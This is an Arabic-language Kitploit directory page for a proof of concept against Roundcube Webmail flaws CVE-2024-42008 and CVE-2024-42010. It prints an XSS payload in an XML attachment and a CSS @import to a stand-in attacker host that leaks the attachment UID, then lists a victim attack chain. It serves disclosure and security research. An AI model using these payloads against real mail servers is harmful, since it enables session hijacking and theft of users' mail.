Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC — إثبات المفهوم لثغرات Roundcube CVE-2024-42008 و CVE-2024-42010 | Kitploit
أدوات/GitHubGitHub/victoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبأمان البريد الإلكتروني
GitHubvictoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc

Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC

إثبات المفهوم لثغرات Roundcube CVE-2024-42008 و CVE-2024-42010

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
2منذ سنة واحدةلم تتم المراجعة بعد

إثبات المفهوم: CVE-2024-42008 و CVE-2024-42010

يُظهر إثبات المفهوم (PoC) هذا استغلال ثغرتين أمنيتين في Roundcube Webmail تمكنان من حقن CSS والبرمجة النصية عبر المواقع (XSS). يتكون الهجوم من مرحلتين:

  1. XSS عبر مرفق XML خبيث (CVE-2024-42008)

    بسبب عدم كفاية فحوصات رفع الملفات، يمكن إرسال ملف XML كمرفق مع كود JavaScript مثال:

    root@kitploit:~
    <something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
    	alert(origin)
    </something:script>
    

    كانت هذه مشكلة معروفة وتم تتبعها كـ CVE-2020-13965 وكان التخفيف هو تعطيل خيار "فتح المرفق". لكن لا يزال من الممكن الوصول إلى الملف من خلال نقطة النهاية

    root@kitploit:~
    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    

    حيث UID هو المعرف الفريد لهذا المرفق المعين في صندوق البريد هذا (أي INBOX).

  2. تسريب HTML عبر حقن CSS (CVE-2024-42010)

    عند إرسال بريد إلكتروني، من الممكن حقن ملف CSS الخاص بك، عند استضافته في نطاق يبدأ بـ a. من خلال ذلك وملف خادم JavaScript يعالج الطلبات المقدمة من مضيف Roundcube الضعيف، من الممكن استخراج UID لمرفق XSS الخبيث.

    استيراد CSS في بريد إلكتروني مرسل باستخدام

    root@kitploit:~
    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    

    استضافة خادم JS (roundcube-css-exploit.js) الذي يسرب UID للمرفق الخبيث

سلسلة الهجوم

  1. استضافة خادم JavaScript في نطاقك
  2. إرسال بريد إلكتروني بمرفق XML خبيث واستيراد CSS من نطاقك
  3. يفتح الضحية البريد الإلكتروني ويتم تسريب UID
  4. ثم، اعتمادًا على الطريقة المفضلة لتوصيل XSS، يمكنك إما إرسال بريد إلكتروني ثانٍ برابط المرفق أو إعادة توجيه المستخدم من خلاله.

المصدر: البريد الإلكتروني الحكومي في خطر: ثغرة البرمجة النصية عبر المواقع الحرجة في Roundcube Webmail (فريق أبحاث الثغرات في Sonar)

تنزيل الأداة